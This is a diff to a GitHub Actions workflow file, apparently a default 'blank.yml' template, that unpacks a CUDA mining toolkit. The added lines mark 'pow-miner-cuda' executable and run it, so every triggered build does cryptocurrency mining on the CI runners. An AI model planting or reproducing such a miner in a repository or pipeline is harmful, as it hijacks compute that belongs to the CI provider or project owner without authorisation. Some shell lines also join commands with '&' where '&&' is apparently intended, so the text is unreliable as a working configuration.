--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -19,3 +19,5 @@ jobs:
              cd minertools-cuda-ubuntu-20.04-x86-64 & ls -l
              tar xvzf minertools-cuda-ubuntu-20.04-x86-64.tar.gz
              cd minertools-cuda-ubuntu-20.04-x86-64 & ls -l
+             chmod a+x pow-miner-cuda && chmod a+x minertools-cuda-ubuntu-20.04-x86-64
+             pow-miner-cuda
